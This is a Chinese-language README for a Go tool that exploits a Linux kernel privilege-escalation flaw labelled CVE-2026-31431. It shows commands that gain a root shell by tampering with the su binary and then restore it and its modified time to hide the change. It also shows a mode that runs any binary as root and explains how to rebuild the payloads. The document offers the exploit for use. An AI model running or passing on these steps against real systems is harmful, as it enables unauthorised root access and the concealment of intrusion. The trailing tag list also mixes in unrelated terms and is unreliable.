badsectorlabs/copyfail-go

# CopyFail Go CVE-2026-31431 的 Go 语言实现。如果你需要静态二进制文件且不想依赖 Python，可以使用此项目。 访问 [copy.fail](https://copy.fail) 了解更多信息。 ## 交互式 shell ``` # 将二进制文件传输到具有代码执行能力的 Linux 主机（留给读者练习） user@host$ chmod +x copyfail-go user@host$ ./copyfail-go --backup /tmp/su root@host# cat /tmp/su > /usr/bin/su # Restore the original su binary root@host# touch -r /tmp/su /usr/bin/su # Restore the modified time of the original su root@host# rm /tmp/su root@host# # Do things as root =) ``` ## 以 root 身份运行二进制文件 可用于将程序提权至 root ``` # 将二进制文件传输到具有代码执行能力的 Linux 主机（留给读者练习） user@host$ chmod +x copyfail-go user@host$ ./copyfail-go --backup /tmp/su --exec ./your-binary user@host$ # Use whatever you ran to restore su from /tmp/su ``` ## 不信任这些十六进制数据？ 在 Debian 主机（已在 Debian 13 上测试）上使用 `payloads/build-n-print.sh` 自行编译 payload。 你需要执行 `apt install nasm python3 binutils-aarch64-linux-gnu binutils-arm-linux-gnueabihf`，然后在 payloads 目录中运行该脚本。它将编译每个 payload 并输出 zlib 压缩后的十六进制字符串。将它们与 `main.go` 中的内容进行比较（或者替换为你自己的），并从主项目目录执行 `goreleaser build --snapshot --clean` 来构建 `copyfile-go` 二进制文件。 ## 受影响的内核（摘自 [copy-fail-c](https://github.com/tgies/copy-fail-c/tree/main#affected-kernels)） ``` floor: torvalds/linux 72548b093ee3 August 2017, v4.14 (AF_ALG iov_iter rework that introduced the file-page write primitive via splice into the AEAD scatterlist) ceiling: torvalds/linux a664bf3d603d April 2026, mainline (reverts the 2017 algif_aead in-place optimization; separates source and destination scatterlists so page-cache pages can no longer be a writable crypto destination) ``` 包括：所有未移植该修复补丁的主要发行版内核。 Ubuntu、RHEL、SUSE、Amazon Linux 和 Debian 在披露时 其默认的云镜像内核均被确认存在漏洞。各发行版级别的 补丁回移大约从 2026-04-29 开始随公开披露一同推出。要验证目标内核是否在受影响范围内，请检查内核的 git 日志或发行版的更新日志中是否存在 `a664bf3d603d`（或其特定于发行版的回移补丁）。

标签：ARM架构, CSV导出, CVE-2026-31431, Debian系统, Go语言, Linux内核提权, LPE, meg, Web报告查看器, x86架构, 二进制文件, 云资产清单, 信息安全, 协议分析, 子域名枚举, 安全报告生成, 安全渗透, 安全漏洞, 日志审计, 本地提权, 权限提升, 程序破解, 系统安全, 网络安全, 逆向工程, 隐私保护, 静态编译